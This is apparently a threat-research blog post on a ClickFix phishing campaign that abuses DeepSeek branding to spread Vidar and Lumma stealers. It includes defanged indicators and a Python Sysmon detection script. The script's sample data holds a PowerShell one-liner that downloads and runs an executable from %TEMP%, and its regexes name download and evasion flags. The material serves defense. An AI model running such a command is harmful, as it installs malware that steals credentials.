Cybercriminals are exploiting DeepSeek’s rising popularity to launch ClickFix phishing campaigns, tricking users into clicking fake CAPTCHA links that steal credentials and install malware like Vidar and Lumma Stealer. These attacks impersonate DeepSeek’s branding to appear legitimate, bypass security measures, and infect unsuspecting victims. CloudSEK’s Threat Research Team has uncovered a malicious domain distributing malware via deceptive verification buttons. Learn how to spot these scams, secure your accounts with MFA, and avoid becoming the next victim! Stay informed and shield your data NOW before it’s too late! 🔥
Threat actors are exploiting the growing popularity of DeepSeek by launching phishing campaigns that use DeepSeek's brand name. These campaigns aim to steal credentials and distribute malware, including through fake investment schemes.
CloudSEK's Threat Research Team has discovered a domain used to spread Vidar Stealer malware through ClickFix phishing campaigns, a type of scam in which victims are tricked into clicking a malicious link that appears to be a CAPTCHA verification. These links often lead to the installation of malware such as the Lumma Stealer mentioned in this report. A previous blog post, published in September of last year, explained the technique in detail.
1. On 31 Jan 2025, CloudSEK’s contextual AI URL Analyser detected a domain named deepseekcaptcha[.]top. The domain was hosted behind Cloudflare and displayed a fake DeepSeek blogger theme offer.
2. The WHOIS record shows that the domain was registered on January 31, 2025. It uses Cloudflare's hosting services to mask its true nature and evade detection by AI-based search engines, allowing it to remain undetected for an extended period.
3. While analysing the functionality and flow of the phishing site, it became apparent that clicking the “Verificate” button on the landing page copies a malicious PowerShell command to the clipboard; once the on-screen instructions are followed, a malicious file download begins.
4. The highlighted command in the screenshot reveals that a file named 1.exe was downloaded to the %TEMP% directory and then executed from there without any further user interaction. Checking the IP address 147.45.44[.]209, we found an open directory listing that exposes all the files and scripts used in the campaign.
5. Based on primary static analysis of the downloaded file, 1.exe is classified as the first-stage downloader of Vidar Stealer, which is used to infect devices and steal information.
6. Further analysis revealed that the stealer has incorporated social media platforms such as Telegram and Steam into its infrastructure for updates and support as well as command-and-control (C2) functionality: the C2 IP address/URL is embedded on a profile page, which the malware retrieves during the initial stage of execution.
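The two behaviours in the analysis above that a defender can actually observe on an endpoint are the pasted PowerShell download-and-execute command (steps 3 and 4) and the dropped binary fetching its C2 address from a Telegram or Steam profile page (step 6). The script below is an added detection example, not CloudSEK's code or tooling: it assumes Sysmon-style field names (EventID 1 for process creation, EventID 3 for network connections, with Image, ParentImage, CommandLine and DestinationHostname), and its sample events, test-network IP, indicator regexes and alert threshold are constructed for illustration rather than taken from campaign logs.

```python
"""Detection logic for the ClickFix chain described in the analysis.

Two stages are checked over Sysmon-like events:
  * EventID 1 (process creation): PowerShell spawned from the Run dialog
    (parent explorer.exe) whose command line downloads a payload into
    %TEMP% and executes it in the same line.
  * EventID 3 (network connection): a binary running from a user-writable
    temp/AppData path contacting a social-media profile host, consistent
    with a dead-drop C2 resolver (Telegram/Steam).

Field names follow Sysmon's schema; thresholds, regexes and the sample
events are assumptions / constructed data for this example.
"""
import re
from typing import Dict, List, Tuple

DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|\bcurl\b|\bwget\b"
    r"|bitsadmin|start-bitstransfer", re.I)
TEMP_RE = re.compile(r"%temp%|\$env:temp|\\appdata\\local\\temp", re.I)
EXEC_RE = re.compile(r"start-process|invoke-item|invoke-expression|\biex\b", re.I)
EVASION_RE = re.compile(r"-w(indowstyle)?\s+h(idden)?\b|-nop\b|-e(xecutionpolicy|p)\s+bypass", re.I)

# Hosts the report names as dead-drop resolvers (assumed list; extend from intel).
DEAD_DROP_HOSTS = {"t.me", "steamcommunity.com"}
# Browsers legitimately live under AppData and talk to these hosts; exclude them.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}


def clickfix_indicators(event: Dict) -> List[str]:
    """Return the ClickFix indicators present in a process-creation event ([] if none)."""
    if event.get("EventID") != 1:
        return []
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return []
    hits = []
    # A command pasted into Win+R runs as a child of explorer.exe, unlike
    # scripts launched by a scheduler, an installer or an admin's terminal.
    if parent.endswith("explorer.exe"):
        hits.append("spawned by explorer.exe (Run dialog)")
    if DOWNLOAD_RE.search(cmd):
        hits.append("download: remote fetch in command line")
    if TEMP_RE.search(cmd):
        hits.append("payload path under %TEMP%")
    if EXEC_RE.search(cmd):
        hits.append("execute: payload launched in the same command")
    if EVASION_RE.search(cmd):
        hits.append("evasion: hidden window / policy bypass flags")
    return hits


def is_clickfix(event: Dict) -> bool:
    """Alert on a download indicator plus at least two others (assumed threshold)."""
    hits = clickfix_indicators(event)
    return any(h.startswith("download") for h in hits) and len(hits) >= 3


def is_dead_drop_lookup(event: Dict) -> bool:
    """True for a non-browser binary in Temp/AppData contacting a dead-drop host."""
    if event.get("EventID") != 3:
        return False
    image = event.get("Image", "").lower()
    host = event.get("DestinationHostname", "").lower()
    if not any(p in image for p in ("\\temp\\", "\\appdata\\")):
        return False
    if image.rsplit("\\", 1)[-1] in BROWSERS:
        return False
    return host in DEAD_DROP_HOSTS or any(host.endswith("." + h) for h in DEAD_DROP_HOSTS)


def scan(events: List[Dict]) -> List[Tuple[int, str, str]]:
    """Run both detections; returns (event index, rule name, detail) per alert."""
    alerts = []
    for i, ev in enumerate(events):
        if is_clickfix(ev):
            alerts.append((i, "clickfix_paste", "; ".join(clickfix_indicators(ev))))
        if is_dead_drop_lookup(ev):
            alerts.append((i, "dead_drop_resolver", ev["DestinationHostname"]))
    return alerts


# CONSTRUCTED sample events (203.0.113.10 is a documentation-range address).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://203.0.113.10/1.exe -OutFile $env:TEMP\1.exe; Start-Process $env:TEMP\1.exe"'},
    {"EventID": 3, "Image": r"C:\Users\victim\AppData\Local\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "t.me", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Users\victim\AppData\Local\Temp\1.exe",
     "DestinationHostname": "steamcommunity.com", "DestinationPort": 443},
]

if __name__ == "__main__":
    for idx, rule, detail in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {detail}")
```

The first rule keys on the parent process rather than on any one cmdlet name, because the lure text changes from campaign to campaign while the Run-dialog delivery does not; the second deliberately whitelists browsers so that ordinary visits to Telegram or Steam profile pages do not page the on-call analyst.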
By following these recommendations, organizations and individuals can significantly reduce their risk of falling victim to phishing attacks and protect themselves from the associated risks of data theft, financial loss, and reputational damage.
Following are the IOCs gathered from the campaign: